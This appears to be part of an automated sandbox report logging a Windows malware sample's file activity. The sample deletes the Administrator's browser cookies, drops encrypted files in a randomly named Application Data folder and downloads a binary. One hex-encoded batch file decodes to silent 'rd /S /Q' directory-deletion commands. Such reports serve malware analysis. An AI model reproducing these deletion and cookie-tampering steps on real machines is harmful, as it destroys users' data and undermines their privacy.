C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F7FAC3
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp read attributes and synchronize and generic read and generic write synchronous io non alert and non directory file false success or wait 1 1F8BAED
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 1F8BAED
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 2 1F8AE2D
+ File deleted
File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt success or wait 1 1F8AFD1
+ File renamed
Old File Path New File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei TRUE success or wait 1 1F7FB39
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei none 5 3E C9 07 4F 00 success or wait 1 1F8BC97
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei none 2623 A7 7C 90 C9 22 56 2F F9 40 3C 90 C5 A3 70 CA 24 B8 36 1D E6 A0 E4 98 0D 1E 3A B9 C1 17 8A C8 0D CD FE 7A B8 8C 5C 4E 10 3D 0D AD B6 E5 FE 11 67 49 E5 F2 78 E5 CA B0 59 41 BA 45 99 4C 71 1F 90 E6 53 C5 E3 2B 6A F6 BD 62 D6 0A EA DC 25 05 3B DA 17 2A 03 31 83 0F F4 3B 88 3D 11 62 59 0A 78 3A FC B6 80 success or wait 1 1F8BCB0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E8 C1 69 AB 94 52 1E 42 DD C3 DA FA EB 82 38 2A B0 03 29 3A 73 7F 61 22 EC 5F 7B E6 1F F6 F6 81 FE 5D B8 7D 34 14 36 02 95 58 0C 87 50 BC 83 6D DF 05 38 CE BC 67 16 7D 31 6E 30 C4 6E 8C 79 D4 89 44 F5 FC 05 4C CC 6A 75 74 38 5E 51 74 C5 E3 7A 6D 52 F7 F8 3C 52 43 7E CE B5 41 E0 E8 B0 C8 0D B9 6D 80 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 4B A0 43 33 C1 56 F2 0D 6D 52 6F D7 8D 83 39 5D C1 F9 66 58 E3 98 C7 F3 71 C2 06 68 82 AF 9D 81 FF BE 63 E1 5F A8 52 D2 90 C3 E9 24 3D 78 5F 5D 79 66 A8 56 C3 F2 73 44 CF E3 1E 10 22 3A CC 01 66 54 46 51 88 FA 51 47 33 1C 46 77 81 CC A8 08 1C 68 AA A3 A2 49 1E 71 ED B4 08 B0 D9 BF FE 80 A5 A4 E0 5E success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 AD 0F E4 12 EE 04 3B C8 AB 15 36 28 0D 06 3B 69 EE 2C 34 F2 B3 4F F9 F3 E9 08 DE AD DF B9 81 B3 8B A0 AD 09 9B FE 6A 6A 2C 25 4A 46 90 80 F1 7A 5E CE 5A 09 5C 0A 51 0B D0 10 EA 6A AB DF AF 4A 51 89 6E BB 3B 58 74 5F 1E 5B 74 DA 80 AA 25 47 3B 6E AF AE E5 A5 79 4E 8A EF 85 43 27 0B A1 99 F1 53 BD AD success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 40 7A AA FC DC 6F 3E FD A6 8D F1 9E 4D 06 D4 91 0E F6 DF BE 36 13 0E C4 87 9F CC AD BC FA C4 B3 7D 98 B6 30 8E A3 CB 3C 56 8D AD 7D CD E4 9B 60 6C B4 0B DE 81 11 A6 60 25 10 A9 B5 A4 67 DD 5B 28 D1 CF 5E AD AF 85 88 49 2A 72 F6 11 20 D3 A0 36 42 9A B4 20 69 22 FD 97 B3 EB 12 54 17 66 09 E7 99 79 B4 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 69 0A 5D 0F E8 28 EF D7 83 3F D5 75 BB 9E B2 D6 1E AB 97 EB C2 FD A9 AA 75 FF 38 73 9F 6E F6 93 64 69 0D 8E 6F 8F 20 72 19 86 E9 9D BF 5A 51 91 56 D2 82 06 3A EB E5 3F BF C8 D7 D5 BE F5 ED 95 12 F1 7F CF A4 41 CF 62 94 06 A1 E1 C8 F7 70 32 0A E9 5B CA CC CD EC 60 E4 22 99 22 D4 56 96 38 EB 55 42 97 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 06 E6 19 3F F2 33 1F 1F 6E 49 0C 0F BB 9D 5B B0 7B AF AF 26 F2 57 DB 20 4C 9F 88 97 15 B1 77 C8 7A 04 D9 06 C8 77 42 58 16 4B CA F6 87 57 6B 22 61 AC 13 88 B4 D6 0A 4D 35 9C F3 E1 75 40 D0 6C 9F 65 27 7F 56 1C 67 C9 FF 08 21 A7 D0 88 D0 87 B0 C7 CB 4F 2A 32 DA 07 C4 F3 32 9D E1 AF 47 11 B7 86 1D 26 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 F5 0A 07 02 C0 AD 24 83 3D ED 6B 4A EB 83 BA 5E 31 C1 6A 1F 83 E6 CB 3C 91 E1 9B FA 32 AD 28 4D BC D6 4B EF D1 E2 13 83 C3 4D 11 94 AA 3F 75 87 FC EB 0B 01 DC 20 C0 71 44 74 D8 BF CB 6B 24 CD B0 A4 58 6D C2 8B 7E C5 09 4E 3F F1 B0 C2 23 B4 54 92 9A 21 EA 50 BB 3A 96 14 06 D2 D2 3C 6F F9 D8 EC 83 EE success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 99 21 0E BB BA 67 24 15 C4 64 3C 37 3D 6C 54 0B 5A CF FB C6 AC 08 5C 2C 48 C2 7D F6 DE 31 94 AE EA C8 39 B6 06 07 60 63 D4 89 B0 9F 07 53 24 95 12 99 B1 6C A3 0C 8B 73 D5 78 07 8B A1 BB 93 3E 35 3E A8 04 03 F0 A1 92 CA 8B 6F 35 EE BE 33 99 2A 81 23 2D 0F 24 40 0F CA 8C 06 42 D1 E1 19 22 48 4F D4 E4 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 64 86 61 BB EB F4 CF 9F 97 BF 46 C0 FF F4 19 94 0A 0C 2C 70 41 F3 3F A1 3A 02 E2 32 66 48 39 4C EB 9B 1E 99 D7 79 0F 60 6F C5 1E 58 12 2B 7A 79 AF 0C F0 D5 E9 40 45 1F BC D7 9B A1 DA DB 1B 9A A9 14 1E 42 32 ED 88 A4 FC F1 09 B5 45 26 FC 3B 96 18 25 E2 2D D8 1D 82 69 0F 29 8D 7A 23 60 6C A1 9E E0 CA success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 6C 75 A2 8D 31 72 F1 A3 5E 50 ED 39 53 3A 83 BF F9 58 E0 29 83 C5 0A 41 63 38 AF C6 91 CA FA 77 BC 31 B9 46 77 6F 84 DE 5A 3B A7 53 97 1A C5 71 97 B1 0B 98 AC 9A 1E BC B8 CF 89 C0 CB 33 50 E5 23 BC 00 CE FC FB A5 24 2E E5 B2 72 29 36 24 41 36 66 56 C0 12 5C 7E 95 9A B5 D4 FC 7A 5F 20 6E 87 79 F9 E9 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 55 DF FB 34 21 8E 82 F1 05 A9 DD 6A 09 2C 6C 26 C3 FE 6A 49 3D E4 4E 7E C5 95 D4 28 23 C1 88 3B 1A EC A4 2C 06 3E 00 C0 B3 EF B5 2B F4 4E 8B 88 56 59 A4 7C 94 F7 E4 17 68 95 CF 66 DB 38 4E C2 A1 F8 32 BA B2 66 BE 23 92 07 E9 2F 72 AB 96 14 FF A0 2E AA EF 4C 56 A9 15 5B 33 91 B2 9A 78 B7 19 A9 3D 3A success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 47 16 31 87 DF 4B C8 C1 6E C4 05 8B EC BB 28 A3 3F 2B 4B 09 56 28 69 C3 99 C5 5D 06 F8 85 2E E5 F0 40 A4 C4 47 BF 20 D0 14 70 87 C4 DF 41 7D 63 6F 5A 4C 81 DA B4 C6 4B F3 10 75 C9 16 77 CF 1B 99 60 08 4B 0E 2B D6 67 C0 1A 54 23 93 3F F3 8A 6D 4B 1E BF 28 F0 89 72 42 30 E8 46 C7 0A E3 84 59 1B CB 89 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 F0 BB 4A AD BD 92 DF 03 56 3C C6 19 5D 67 A4 EB F6 05 92 85 D1 8E 97 0D EA E0 E1 56 BC A4 F5 39 30 89 FB 69 D3 1C BC 0E 35 72 4F 8C 60 CC F7 A8 D5 36 3D AF 44 68 46 05 65 3B C1 9A 20 83 79 0D A5 3D DE 63 47 83 83 5C 9C 5A C7 BC 93 7E 0E A6 89 7F 5E D3 D8 6F 11 2B 84 BD 58 9A 0C 97 09 3C 22 27 84 DF success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E0 7A AB 29 B6 64 36 09 DC 1C D2 4A 01 94 5D 59 3E 54 E3 69 EA 14 20 AB 88 7C 09 41 6D 20 90 2B 01 41 8B 3D 69 FE 00 11 C3 D7 38 CB 5A 69 08 7C 14 4F 7C 5C 2B BD 43 33 3F 0C 57 95 D3 B2 2B 28 CE F3 8D B1 22 AD 0A FC C2 4A 43 48 15 C3 C1 3C 63 A4 05 F6 BB 26 16 0B 87 8F 39 B9 5A A0 B7 41 22 DF 59 EF success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 97 2B F4 DB 30 C7 B2 CF 0A 5C 73 23 48 93 F9 EB 95 0A 71 FC 03 53 82 D6 5E D8 E0 CA D1 01 93 46 AE 54 9D E3 A3 27 13 17 4A B4 26 08 EE F3 94 0D A1 4A 83 36 39 FA 0E 64 DD 21 7C 40 B3 68 B6 62 2E D7 47 F8 30 4E 78 5F C5 8E 45 2C B6 7C B5 5C 13 72 A6 5C ED DC 8D 09 FD E6 1C 98 41 3F B2 4D 7C 3D 98 52 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E4 53 3B CB C0 3B D0 3D 6F 73 3A 50 80 15 EB 8C F7 D2 57 CE 71 89 06 57 D1 01 AA 74 3D CA 2B 8E 04 08 1D 6D 3D A4 60 39 3A 84 24 C4 43 58 1E CB 56 E3 67 F1 3F 44 E7 B8 7D 93 00 04 5A 1A 7F E5 D7 12 BF 2D D9 59 C9 EF C3 24 95 36 08 EB E4 DF 91 A4 28 53 08 DB EE 2D 41 39 81 BE 3E 9A 81 E8 DE 58 DB 3F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 1F B1 4D 5A F6 09 0F E7 6D 47 FC DC 0A 33 7C B7 3B DC DC 41 E0 72 B6 AE 39 0F DD A0 69 48 92 E4 4C 24 C7 C3 6C FD C0 A2 FC EF 53 DD BC 14 01 48 4A 99 E6 AE 6E FE A9 2B 3E 4D 63 09 09 9A BE E9 3D D0 BF 0F DF 1C CF 78 0D 50 72 87 2B D1 FB 5E 60 28 11 B2 1B D3 BB 0F 34 13 23 00 9A 4C 24 14 A8 77 03 43 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 C6 11 BD 48 D2 BF 05 A0 B4 A0 92 93 52 56 2F 88 C5 E2 F8 64 B1 09 8D DA 73 2B C8 1C 9F FB 67 76 CB 6C 86 92 FD 23 94 F4 90 97 7D C1 DB EE E5 21 5F A6 6F F1 24 48 47 46 76 13 FC ED 9E 7C 77 B5 DA E2 19 1E CD B7 D3 DA A2 06 55 67 E9 7D 1B E7 88 7B 3B 98 02 0B 8B 2D E3 B1 D6 71 C0 2A 31 EA 52 60 6A D4 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 45 86 E2 26 84 33 7B BD DA 94 CB 05 CB 8E 38 E1 1A 1B DE 83 EE 83 4E C9 E1 6E BB 27 08 B4 DE E0 D2 79 B7 1C 08 B5 14 03 42 DB C2 DD 3B CF 52 BF 5F 38 91 41 49 C0 8F C8 22 A2 F9 B4 11 65 1C 14 45 7B B5 72 41 F9 FD 4B E5 32 08 4B 2B 6D 3E 26 37 A4 CC B7 14 34 C3 63 21 21 88 F3 96 51 8F D3 42 F5 EA 44 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E5 62 4D 93 43 E1 F9 4D 0E 85 91 3C 76 5A 00 74 E3 0C 35 EC DA 89 05 37 DA C7 8F A4 CC F9 24 DB 1F 41 F3 72 D3 20 A2 40 0C CD 3B 0A D4 1E 74 5D F2 32 D9 72 61 4B 93 12 4F 80 3D 55 CC 2E DC 84 3F 57 24 BF 22 C3 EB 32 2D 50 FA ED B9 0C 68 41 8F 95 83 72 5D C8 4F 72 9E 19 B3 48 7F CC 9D A3 02 1A 3F F7 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 79 45 F7 35 5A CC E9 5E 7B C6 CD 62 EA 48 85 12 E5 21 ED 74 83 A2 25 AD ED A8 0D DF E0 13 E9 99 CC 88 D8 E7 FB 6C 54 71 C4 67 7F 06 3A 78 B0 85 3D 22 CA 97 70 52 0A F6 2B 6E 67 AE 28 74 C1 99 96 07 82 E4 55 C7 E3 B9 B7 4A 93 76 9D 27 78 50 F3 FB 65 AB E4 D6 C9 04 A4 EA E4 FA 9E A1 E7 7D 7C 2F 8E F1 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 F0 5E E3 6E FE 69 0C FF 5C A3 90 11 C8 13 B5 D0 62 A1 31 D5 43 DE 59 86 E0 9D 5E EF E4 AB BF 02 0E D1 F7 FE CC DD 16 E1 7B AB B3 8A CE 1B E1 B4 38 4F 6C 56 D5 4C F6 C2 52 4A 54 DC D8 96 CC 7E 66 18 3D B4 78 14 39 AB 58 36 29 17 29 50 8B D7 3C B7 20 A1 74 F5 0F B8 1C 34 43 B4 5A A2 F7 BA 08 97 0D 6F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 75 C6 03 D3 5E 26 EE 7B 44 60 57 30 0C BC 13 BA 64 80 EF 96 96 BD 44 9A F2 B1 16 E5 D3 A0 93 E7 6C 1F 40 6A 9E 12 57 A2 6C 4D 9B B5 F7 79 45 CA 19 05 2A 69 D6 15 12 D9 D2 03 52 C3 D3 84 82 58 A2 76 07 37 72 90 FF 08 F5 99 D8 F1 3C B7 4F 7F 3A FC 74 9D 13 A4 1C D7 15 8A DD 06 B9 73 0E 06 9F 39 65 01 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 AE 8B F3 EC EC 9A BF BC 8C 2E 61 D2 36 44 41 85 C2 34 10 70 09 23 9A 76 2F 07 EC FD 89 BE B0 DB C5 A5 96 6A CC 13 F7 4A CE 2B 88 D4 4E 37 D2 28 0E E9 92 6D 49 59 0E 6E 69 65 95 6A 1F CB C6 16 EA 3D F2 C7 DA 8F 1F 22 AE BB 5E 11 9C D0 F8 BB FC D5 6E F5 74 18 48 5B 99 81 0F 81 9E 01 C5 69 FA 9B C2 E6 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 C1 37 E5 67 CB 5E 73 D8 5B 88 F8 C7 95 4E 72 59 D5 95 AC 28 B9 2D 5E CE 6E 7B 87 E8 20 75 95 16 6C 0A D4 9F 3F 4E 01 0B 8D 99 16 A6 2A 6F B4 36 62 33 E6 61 4B CF D8 86 87 18 82 95 4E A5 2B D2 8F 12 9D 09 5C 4E 74 C4 1B A9 38 21 A3 BA 1B FB 8D D5 35 AF 17 4E A3 76 CA DC 22 37 1A 08 C0 4F 49 1C 50 3D success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 3090 3D DA 00 B7 2C F6 EF 92 FD B5 B9 ED 86 86 47 E7 E3 8E D9 08 D5 5F B3 C6 54 ED 57 A0 E1 31 51 2B 54 BD 62 13 D0 06 7B 2A 0A 3A 35 67 C5 36 B7 40 FE B3 27 0F 87 CF 90 15 2F FC 1E 9A 32 62 5D B0 1E 9E 32 F7 F7 01 70 F8 9C 6F 74 73 4A 2E 1A 68 DF EC 83 31 E8 55 6E 79 CC 1F 30 AC 04 05 BD 18 0F C9 DE 91 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 3C 21 64 6F 63 74 79 70 65 20 68 74 6D 6C 3E 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 58 2D 55 41 2D 43 6F 6D 70 61 74 69 62 6C 65 22 20 63 6F 6E 74 65 6E 74 3D 22 49 45 3D 65 64 67 65 22 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 63 6F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 64 64 69 6E 67 3A 31 30 70 78 20 30 3B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 7A 2D 69 6E 64 65 78 3A 32 3B 7A 6F 6F 6D 3A 31 7D 2E 67 62 74 7B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 64 69 73 70 6C 61 79 3A 2D 6D 6F 7A 2D 69 6E 6C 69 6E 65 2D 62 6F 78 3B 64 69 73 70 6C success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 65 7B 66 6F 6E 74 2D 77 65 69 67 68 74 3A 62 6F 6C 64 7D 23 67 62 6D 70 70 7B 64 69 73 70 6C 61 79 3A 6E 6F 6E 65 7D 23 67 62 64 34 20 2E 67 62 6D 63 63 7B 6D 61 72 67 69 6E 2D 74 6F 70 3A 35 70 78 7D 2E 67 62 70 6D 63 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 65 64 66 65 65 61 7D 2E 67 62 70 6D 63 20 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 61 74 69 6F 6E 3A 6E 6F 6E 65 7D 23 73 73 2D 62 6F 78 20 61 3A 68 6F 76 65 72 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 34 44 39 30 46 45 3B 63 6F 6C 6F 72 3A 23 66 66 66 21 69 6D 70 6F 72 74 61 6E 74 7D 61 2E 73 73 2D 73 65 6C 65 63 74 65 64 7B 63 6F 6C 6F 72 3A 23 32 32 32 21 69 6D 70 6F 72 74 61 6E success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 67 72 6F 75 6E 64 2D 69 6D 61 67 65 3A 2D 6D 73 2D 6C 69 6E 65 61 72 2D 67 72 61 64 69 65 6E 74 28 74 6F 70 2C 23 64 64 34 62 33 39 2C 23 62 30 32 38 31 61 29 3B 66 69 6C 74 65 72 3A 70 72 6F 67 69 64 3A 44 58 49 6D 61 67 65 54 72 61 6E 73 66 6F 72 6D 2E 4D 69 63 72 6F 73 6F 66 74 2E 67 72 61 64 69 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 63 3D 61 3B 43 3D 63 2B 31 7D 2C 44 3D 5B 5D 2C 43 3D 30 3B 6E 28 22 6C 6F 67 67 65 72 22 2C 7B 69 6C 3A 42 2C 6D 6C 3A 41 7D 29 3B 76 61 72 20 46 3D 77 69 6E 64 6F 77 2E 67 62 61 72 2E 6C 6F 67 67 65 72 3B 76 61 72 20 47 3D 5F 74 76 66 28 22 30 2E 30 31 22 2C 31 2E 30 45 2D 34 29 2C 48 3D 30 3B 0A success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 2C 69 29 3B 57 28 61 2C 22 22 29 7D 7D 2C 4B 61 3D 66 75 6E 63 74 69 6F 6E 28 61 29 7B 74 72 79 7B 55 28 29 3B 76 61 72 20 62 3D 61 7C 7C 64 6F 63 75 6D 65 6E 74 2E 67 65 74 45 6C 65 6D 65 6E 74 42 79 49 64 28 54 29 3B 69 66 28 62 29 7B 57 28 62 2C 22 54 68 69 73 20 73 65 72 76 69 63 65 20 69 73 20 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 61 70 70 65 6E 64 43 68 69 6C 64 28 62 2E 63 6C 6F 6E 65 4E 6F 64 65 28 74 72 75 65 29 29 7D 63 61 74 63 68 28 65 29 7B 63 28 65 29 7D 7D 3B 61 2E 61 6F 6D 63 3D 66 3B 7D 63 61 74 63 68 28 65 29 7B 77 69 6E 64 6F 77 2E 67 62 61 72 26 26 67 62 61 72 2E 6C 6F 67 67 65 72 26 26 67 62 61 72 2E 6C 6F 67 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 69 64 3D 67 62 5F 32 35 20 68 72 65 66 3D 22 68 74 74 70 73 3A 2F 2F 64 6F 63 73 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 3F 74 61 62 3D 77 6F 22 20 6F 6E 63 6C 69 63 6B 3D 22 67 62 61 72 2E 6C 6F 67 67 65 72 2E 69 6C 28 31 2C 7B 74 3A 32 35 7D 29 22 3E 44 6F 63 75 6D 65 6E 74 73 3C 2F 61 3E 3C 2F 6C 69 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 3E 20 3C 2F 64 69 76 3E 20 3C 2F 74 64 3E 20 3C 2F 74 72 3E 20 3C 2F 74 61 62 6C 65 3E 20 3C 2F 74 64 3E 20 3C 74 64 3E 20 20 3C 64 69 76 20 63 6C 61 73 73 3D 22 6E 6F 6A 73 76 22 20 73 74 79 6C 65 3D 22 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 68 65 69 67 68 74 3A 33 30 70 78 22 20 69 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 6F 67 6C 65 2E 6D 73 67 26 26 67 6F 6F 67 6C 65 2E 6D 73 67 2E 73 65 6E 64 28 36 34 29 7D 66 75 6E 63 74 69 6F 6E 20 76 28 61 29 7B 76 61 72 20 62 3D 66 61 6C 73 65 3B 74 72 79 7B 62 3D 77 69 6E 64 6F 77 2E 65 78 74 65 72 6E 61 6C 2E 69 73 47 6F 6F 67 6C 65 48 6F 6D 65 50 61 67 65 28 29 7D 63 61 74 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 34 41 43 77 72 4D 4B 77 42 4F 41 41 73 4B 7A 42 30 4F 41 41 73 4B 7A 41 64 4F 41 41 73 4B 7A 42 63 4F 41 41 73 4B 7A 41 59 4F 41 41 73 4B 7A 41 6D 4F 41 41 73 67 41 4A 66 6B 41 4A 62 2F 4E 65 57 39 6F 41 64 45 79 6A 45 2E 6A 73 27 29 3B 67 6F 6F 67 6C 65 2E 78 6A 73 3D 31 7D 28 66 75 6E 63 74 69 6F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 2852 39 32 2C 7B 22 61 65 22 3A 74 72 75 65 2C 22 61 76 67 54 74 66 63 22 3A 32 30 30 30 2C 22 62 70 65 22 3A 66 61 6C 73 65 2C 22 62 72 62 61 22 3A 66 61 6C 73 65 2C 22 64 6C 65 6E 22 3A 32 34 2C 22 66 62 64 63 22 3A 35 30 30 2C 22 66 62 64 75 22 3A 33 30 30 30 2C 22 66 62 68 22 3A 74 72 75 65 2C 22 66 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm none 93 28 3F DF CC 1A 3B 7B 91 90 86 C1 7C 38 88 CF A9 A5 C2 5C DF D9 49 56 15 DB 68 4C D1 02 EB EB 9C F4 35 B3 26 CF 10 3B F5 5E CD 6F 93 6B 5D 93 1D 8F 1B 26 D0 A2 79 08 73 26 79 27 D3 60 82 77 DA A3 78 7A 52 3A A7 8A A2 6F A2 9A 37 E8 99 47 A9 76 0E 45 BF AD 73 00 0F 7B 90 A5 4D E9 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm none 64 8C 75 87 84 27 E6 70 83 E6 84 3E 81 1E 7B E6 BD D9 9D EF 62 79 E9 F6 B5 7B C8 EC 71 A2 4B 4B 3C 4B 2F FD DD 66 CC 33 A9 FA 26 DE B4 F1 BE 2F 26 B5 21 1C EA 98 43 32 49 01 5E 00 F4 5A B8 4D E0 success or wait 1 1F87A65
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 392 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 1 1F8AE50
+ File read
File Path Offset Length Value Completion Count Source Address
